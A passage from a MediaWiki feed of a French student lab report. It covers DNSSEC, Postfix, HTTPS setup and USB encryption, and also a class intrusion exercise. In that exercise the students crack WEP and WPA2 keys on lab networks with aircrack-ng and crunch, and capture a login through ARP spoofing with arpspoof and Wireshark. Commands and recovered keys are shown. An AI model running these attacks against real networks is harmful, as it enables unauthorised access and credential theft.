 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on resoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commance &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de gandi on resoit un codde de confimartion ainsi q'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers gandi a télechargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionn pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
Pour éviter d'avoir la page de base Apash2, on va modifier le fichier 'index.html' pour cela il suffit d'éditer le fichier avec vim avec la commande &amp;lt;code&amp;gt;vim /var/www/html/index.html&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54005</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54005"/>
				<updated>2020-11-27T16:48:35Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Réception d'un message */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
